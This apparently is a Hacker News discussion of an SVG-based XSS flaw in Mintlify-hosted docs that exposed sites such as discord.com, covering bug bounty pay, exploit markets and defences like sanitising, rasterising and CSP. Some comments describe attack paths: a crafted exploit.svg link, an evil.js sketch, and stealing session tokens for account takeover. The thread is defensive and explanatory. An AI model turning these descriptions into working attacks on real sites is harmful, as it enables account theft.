XSS is not dead, and the web platforms mitigations (setHTML, Trusted Types) are not a panacea. CSP helps but is often configured poorly.
So, this kind of widespread XSS in a vulnerable third party component is indeed concerning.
For another example, there have been two reflected XSS vulns found in Anubis this year, putting any website that deploys it and doesn't patch at risk of JS execution on their origin.
Audit your third-party dependencies!
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
Anubis is promoting itself as a sort of Cloudflare-esque service to mitigate AI scraping. They also aren't just an open source project relying on gracious donations, there's a paid whitelabel version of the project.
If anything, Anubis probably should be held to a higher standard, given many more vulnerable people (as in, vulnerable against having XSS on their site cause significant issues with having to fish their site out of spam filters and/or bandwidth exhaustion hitting their wallet) are reliant on it compared to big corporations. Same reason that a bug in some random GitHub project somewhere probably has an impact of near zero, but a critical security bug in nginx means that there's shit on the fan. When you write software that has a massive audience, you're going to have to be held to higher standards (if not legally, at least socially).
Not that Anubis' handling of this seems to be bad or anything; both XSS attacks were mitigated, but "won't somebody think of the poor FOSS project" isn't really the right answer here.
The vulnerabilities that command real dollars all have half-lives, and can't be fixed with a single cluster of prod deploys by the victims.
In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's like worth 2GB of RAM or something.
It's not just compensation, it's a gesture. And really bad PR.
Could you elaborate on this? I don't fully understand the shorthand here.
what's an example of an existing business process that would make them valuable, just in theory? why do they not exist for xss vulns? why, and in what sense, are they only situational and time-sensitive?
i know you're an expert in this field. i'm not doubting the assertions just trying to understand them better. if i understand you're argument correctly, you're not doubting that the vuln found here could be damaging, only doubting that it could be make money for an adversary willing to exploit it?
Yes, evidently not.
Just because on average the intelligence agencies or ransom ware distributors wouldn't pay big bucks for XSS on Zerodium etc. doesn't mean that's setting the fair, or wise price for disclosure. Every bug bounty program is mostly PR mitigation. It's bad PR if you underpay for a disclosed vulnerability, which may have ended your business, considering the price of security audits/practices you cheaped out on. I mean, most bug bounty programs are actually paid by scope, not market price for technically comparable exploits. If you found an XSS vulnerability in an Apple service with this scope, I bet you would have been paid more than 4k.
The lowest tier is $5k. XSS up to $40k. I think we're talking exfiltration of dev credentials...
This is very sad because SVGs often have way smaller file size, and obviously look much better at various scales. If only there was a widely used vector format that does not have any script support and can be easily shared.
The only reliable solution would be an allowlist of safe elements and attributes, but it would quickly cause compat issues unless you spend time curating the rules. I did not find an existing lib doing it at the time, and it was too much effort to maintain it ourselves.
The solution I ended up implementing was having a sandboxed Chromium instance and communicating with it through the dev tools to load the SVG and rasterize it. This allowed uploading SVG files, but it was then served as rasterized PNGs to other users.
(Yes I'm still salty about Flash.)
That wasn't the only reason. Flash was also proprietary, and opaque, and single-vendor, among many other problems with it.
Do you allow SVGs to be uploaded anywhere on your site? This is a PSA that you're probably at risk unless you can find the few hundred lines of code doing the sanitization.
Note to Ruby on Rails developers, your active storage uploaded SVGs are not sanitized by default.
Didn’t we do this already with Flash? Why would this lesson not have stuck?
It’s so regular like clockwork that it has to be a nation state doing this to us.
1: https://owasp.org/www-community/vulnerabilities/XML_External...
Whoever decided it should be enabled by default should be put into some sort of cybersecurity jail.
If you must open a possibly infected pdf, then do it in browser, pdf.js is considered mostly safe, and updated.
In one of my penetration testing training classes, in one of the lessons, we generated a malicious PDF file that would give us a shell when the victim opened it in Adobe.
Granted, it relied on a specific bug in the JavaScript engine of Adobe Reader, so unless they're using a version that's 15 years old, it wouldn't work today, but you can't be too cautious. 0-days can always exist.
The biggest problem, again, is that the vulnerabilities disappear instantaneously when the vendors learn about them; in fact, they disappear in epsilon time once the vulnerabilities are used, which is not how e.g. a mobile browser drive-by works.
I don't have it in front of me, but I'm talking about the "nobody but us" era of exploit markets:
https://en.wikipedia.org/wiki/NOBUS
Where the NSA seemingly was buying anything, even if not worthwhile, as a form of "munitions collection" to be used for the future attacks.
edit: this mostly ended in the US because other nations started paying more, add in more regulations (only a handful companies are allowed to sell these exploits internationally) and software companies starting to do basic security practices (along with ruling out their own bug bounties), it just mostly whimpered away.
Also relevant to the discussion, the book discusses how the public exploit markets are exploitive to the workers themselves (low payouts when state actors would pay more) and there are periods of times where there would be open revolts too (see 2009 "No More Free Bugs" movement, also discussed in the book).
Definitely worth it if you aren't aware of this history, I wasn't.
In reality, intelligence agencies today don't even really stockpile mobile platform RCE. The economics and logistics are counterintuitive. Most of the money is made on the "backend", in support/update costs, paid in tranches; CNE vendors have to work hard to keep up with the platforms even when their bugs aren't getting burned. We interviewed Mark Dowd about this last year for the SCW podcast.
Kid was simply born in the wrong era to cash out easy money.
Building reliable exploits is very difficult today, but the sums a reliable exploit on a mainstream mobile platform garner are also very high. Arguably, today is the best time to be doing that kind of work, if you have the talent.
This is also why an `app.` or even better `tenant.` subdomain is always a good idea; it limits the blast radius of mistakes like this.
We've made different product decisions than them. We don't support this, nor do we request access to codebases for Git sync. Both are security issues waiting to happen, no matter how much customers want them.
The reason people want it, though, is for SEO: whether it's true or outdated voodoo, almost everyone believes having their documentation on a subdomain hurts the parent domain. Google says it's not true, SEO experts say it is.
I wish Mintlify the best here – it's stressful to let customers down like this.
I think the answer likely is quite nuanced, for what it's worth.
I've never heard an XSS vulnerability described as a supply-chain attack before though, usually that one is reserved for package managers malicious scripts or companies putting backdoors in hardware.
As an end user you can't really mitigate this as the attack happens in the supply chain (Mintlify) and by the time it gets to you it is basically opaque. It's like getting a signed malicious binary. It looks good to you and the trust model (the browser's origin model) seems to indicate all is fine (like the signing on the binary). But because earlier in the supply chain they made a mistake, you are now at risk. Its basically moving an XSS up a level into the "supply chain".
If I recall last week Mintlify wrote a blog post showcasing their impressive(ly complicated) caching architecture. Pretending like they were doing real engineering, when it turns out nobody there seems to know what they're doing, but they've managed to convince some big names to use them.
Man, it's like everything I hate about modern tech. Good job Eva for finding this one. Starting to think that every AI startup or company that is heavily using gen-ai for coding is probably extremely vulnerable to the simplest of attacks. Might be a way to make some extra spending money lol.
But like, this case isn't really a dependency or supply chain attack. It's just allowing remote code execution because, idk, the dev who implemented it didn't read the manual and see that MDX can execute arbitrary code or something. Or maybe they vibe coded it and saw it worked and didn't bother to check. Perhaps it's a supply-chain attack on Discord et al to use Mintlify, if thats what you meant then I apologize.
I think you're right that I have an extreme aversion to SFBA-style software development, and partly because of how gen-ai is used there.
The component which ultimately executed the payload in the SVG was the browser, and the backend dependency stack just served it verbatim as specified by the user. This is a 1990's style XSS fuckup, not anything subtle.
Companies will create bug bounty programs where they set ground rules (like no social engineering), and have guides on how to identify yourself as an ethical hacker, for example:
For example they might send the police to your door, who’ll tell you you’ve violated some 1980s computer security law.
I know 99.99% of cybercrime goes unpunished, but that’s because the attackers are hard to identify, and in distant foreign lands. As a white hat you’re identifiable and maybe in the same country, meaning it’s much easier to prosecute you.
Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work. Finding bugs in the wild as this researcher did often gets wildly underpaid relative to the potential impact of the bug, if they pay or take it seriously at all.
These companies should be ashamed paying out so little for this, and it is only a matter of time before they insult the wrong researcher who decides to pursue paths to maximum profit, or maximum damage, with a vuln like this.
So, rough estimate, how much would you have made for this?
Even that is quite cheap compared to letting a blackhat find this.
Ok, you got "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma..." to send a controlled payload
But regular users will never hit "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma...", so they will never execute your script
I fail to understand how this can be exploited, by whom and in what conditions
You mention one method being a cookie sent to an attacker-controlled domain, but that in itself is a vulnerability given it being incorrectly scoped (missing HTTPOnly & SameSite atleast).
> the auth token is stored in local storage
Has anyone reported this (rhetorical question)? What in the world could be the justification for this?
In my opinion, any full account takeovers due to XSS is a vulnerability, even ignoring XSS. Changing email/password/phone should require verification back to one of those methods. Or at least input of the previous password.
Thankfully the browser prevents sending the cookies cross origin or else this is just a single click exploit.
Edit: I gave too much credit to Discord here. They aren't protecting their tokens correctly.
Apparently one of the other linked posts shows how you can also gain RCE, since the docs are statically pre-rendered and there’s no sandboxing to prevent you from evalling arbitrary JavaScript.
Yep, here it is: https://kibty.town/blog/mintlify/
Also linked in his guide (which I missed) and [here in a separate HN post](https://news.ycombinator.com/item?id=46317546). I think this other author's post is a lot more detailed and arguably more useful to folks reading on HN.
If you sign a contract with a "hacker", then you are expecting results. Otherwise how do you decide to renew the contract next year? How do you decide to raise it next year? What if, during this contract, a vulnerability that this individual didn't found is exploited? You get rid of them?
So you're putting pressure on a person who is a researcher, not a producer. Which is wrong.
And also there's the scale. Sure, here you have one guy who exploited a vulnerability. But how long it took them to get there? There's probably dozens of vulnerabilities yet to be exploited, requiring skills that differ so much from the ones used by this person that they won't find them. Even if you pay them for a full-time position.
Whereas, if you set up a bug bounty program, you are basically crowdsourcing your vulnerabilities: not only you probably have thousands of people actively trying to exploit vulnerabilities in your system, but also, you only give money to the ones that do manage to exploit one. You're only paying on result.
Obviously, if the reward is not big enough, they could be tempted to sell them to someone else or use them themselves. But the risk is here no matter how you decide to handle this topic.
I have a friend who at one point had five monitors and 2 computers (actually it might be 3) on his desk and maybe he’s the one doing it right. He keeps his personal stuff and his programming/work stuff completely separate.
Although with the amount of crap I have to install for windows development I'm starting to wonder if a base VM image that is used as a start point for each project would be cleaner.
Mintlify security is the worse I have even encountered in a modern SaaS company.
They will leak your data, code, assets, etc. They will know they did this. You will tell them, they will acknowledge that they knew it happened, and didn't tell you.
Your docs site will go down, and you will need to page their engineers to tell them its down. This will be a surprise to them.
Found by a 16 year old, what a legend.
ALSO as someone who maintains a file upload pipeline I run every SVG through a sanitizer... Tools like DOMPurify remove scripts and enforce a safe subset of the spec... I even go as far as rasterizing user uploaded vectors to PNG when possible
HOWEVER the bigger issue is mental... Most folks treat SVG like a dumb image when browsers treat it like executable content... Until the platform changes that expectation there will always be an attack surface
With those (all these are "possible" but not always, as usual, it depends, and random off the top of my head):
- I can redirect you to sites I control where I may be able to capture your login credentials.
- May be able to prompt and get you to download malware or virus payloads and run them locally.
- Can deface the site you are on, either leading to reputational harm for that brand, or leading you to think you're doing one thing when you're actually doing another.
- I may be able to exfiltrate your cookies and auth tokens for that site and potentially act as you.
- I might be able to pivot to other connected sites that use that site's authentication.
- I can prompt, as the site, for escalated access, and you may grant it because you trust that site, thereby potentially gaining access to your machine (it's not that the browsers fully restrict local access, they just require permission).
- Other social engineering attacks, trying to trick you into doing something that grants me more access, information, etc.
goodsite.com loads a script from user-generated-content-size.com/evil.js
evil.js reads and writes all your goodsite.com account data.
The OP site says that .svg files can only run scripts if they are directly opened, not via <img> tags.
So how does the attack work?
As for CORS, they were uploading the SVGs to an account of their own, but then using the vulnerabilities to pivot to other accounts.
I have this feeling with almost all web tools I am required to use nowadays.
No trust.
if extension == .svg
set-header Content-Security-Policy: script-src 'none'
end
wouldn't that stop a browser from running scripts, even if the svg file is opened directly? having this be widespread would solve it wholesale.1. content security policies should always be used to prevent such scripts (here they would prevent execution of scripts from the SVG)
2. The JavaScript ecosystem should be making ` --disallow-code-generation-from-strings` a default recommendation when running NodeJS on the server.
Vercel (and other nodejs as a service providers) should warn customers that don't use CSP and `--disallow-code-generation-from-strings` that their settings should be improved.
There are a bunch of other NodeJS flags that maybe you should look into too: https://sgued.fr/blog/react-rce/#node-js-mitigations
Imagine just one link in a tweet, support ticket, or email: https://discord.com/_mintlify/static/evil/exploit.svg. If you click it, JavaScript runs on the discord.com origin.
Here's what could happen:
- Your Discord session cookies and token could be stolen, leading to a complete account takeover.
- read/write your developer applications & webhooks, allowing them to add or modify bots, reset secrets, and push malicious updates to millions.
- access any Discord API endpoint as you, meaning they could join or delete servers, DM friends, or even buy Nitro with your saved payment info.
- maybe even harvest OAuth tokens from sites that use "Login with Disord."
Given the potential damage, the $4,000 bounty feels like a slap in the face.
edit: just noticed how HN just turned this into a clickable link - this makes it even scarier!
And serves a reminder crime does pay.
In the black market, it would have been worth a bit more.
To elaborate, to exploit this you have to convince your target to open a specially crafted link which would look very suspect. The most realistic way to exploit would be to send a shortened link and hope they click on it, that they are logged into discord.com when they do (most people use the app) etc
No real way to use this to compromise a large amount of users without more complex means
"I'd rather hire a junior dev who knows the latest version of NextJS than a senior dev who is experienced with an earlier version."
This would be a forgivable remark, except the recruiter was aware of the shortsightedness, and likely attempted to coach the hiring manager...
normie3000•3h ago
FloorEgg•3h ago
Pathetic for a senior SE but pretty awesome for a 16 year old up and coming hacker.
tuesdaynight•3h ago
finghin•2h ago
james_marks•23m ago
That’s a free car. Free computer. Uber eats for months.
And my status with my peers as a hacker would be cemented.
I get that bounty amounts are low vs SE salary, but that’s not at all how my 16yo self would see it.
grenran•7m ago
finghin•2h ago
ascorbic•2h ago
bbarn•1h ago
MeetingsBrowser•2h ago
I agree $4,000 is way too low, but a $400k salary is really high, especially for security work.
tuesdaynight•3h ago
charlesabarnes•3h ago
tptacek•2h ago
jfindper•2h ago
tptacek•2h ago
jijijijij•1h ago
bytecauldron•3h ago
oxandonly•2h ago